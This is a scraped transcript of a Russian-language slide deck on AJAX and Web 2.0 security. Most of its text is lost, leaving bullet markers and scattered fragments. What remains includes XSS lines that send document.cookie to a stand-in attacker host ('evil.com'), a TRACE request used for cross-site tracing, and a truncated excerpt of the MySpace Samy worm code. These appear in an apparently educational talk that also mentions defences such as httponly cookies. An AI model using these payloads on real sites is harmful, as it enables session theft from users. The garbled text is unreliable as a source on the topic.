безопасность ajax приложений александр капранов
TRANSCRIPT
- 1. AJAX
-
- Web 2.0 Security
-
, [email_address] 2.
-
- ?
-
- .. AJAX?
-
- .
-
- ().
3.
-
- ?
-
- .. AJAX?
-
- .
-
- ().
4.
- .
- .
-
- 1 , 1 , 1 , 2 ;
-
- ;
-
- ;
-
- script kiddies.
5.
- 90% - ( UK) ( NTA Monitor).
- Google 2 phpBB.
- CERT advisory XSS 02.02.2000, xss mail.li.ru 30 .
6.
-
- code, SQL injection
- . OWASP Top Ten 2007.
7. Sokr.Ru:
- , , ,
8. http://myappsecurity.blogspot.com/ 9. Hey, Jacks
- AJAX ().
- AJAX .
- XmlHttpRequest (Flash,
- : vs. .
10. XSS (Cross Site Scripting)
- s.cgi?q=
- img1.src='evil.com?' + cookie;
- (Carnaval, AttackAPI)
setTimeout loop + remote reqs JS- .com/control.cgi 11. 12. XSS
- $text = q{a/;alert(42);/};
- HTML- !
13. CSRF (X Site Request Forgery)
- POST
14. CSRF
-
- JS
-
- JSON ( )
- Gmail, 2006.
- .
15. CSRF
- : XmlHttpRequest * mhtml MSIE vuln = GET .
- .
16. All your cookies are belong to us
- img1.src = 'http://.com/' + document.cookie;
- : httponly cookies.
- : XST.
TRACE / HTTP/1.1 Cookies: XHR squid 17.
- Click to Enter YOUR Bank!!
- :
- XSS+AJAX = JavaScript, URL!
18. 19. Javascript is the new shellcode
- MySpace worm, samy is my hero, 2004
- {var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O0){N+='&'}var
- OWASP 2007 . XSS shell & sql injections.
20.
- OpenID .
- XSS RSS.
- UGC ( NetVibes).
- client-side persistence (visited links, cache).
21.
- Drive-by Pharming.
- MySpace worm samy is my hero, .
22. ?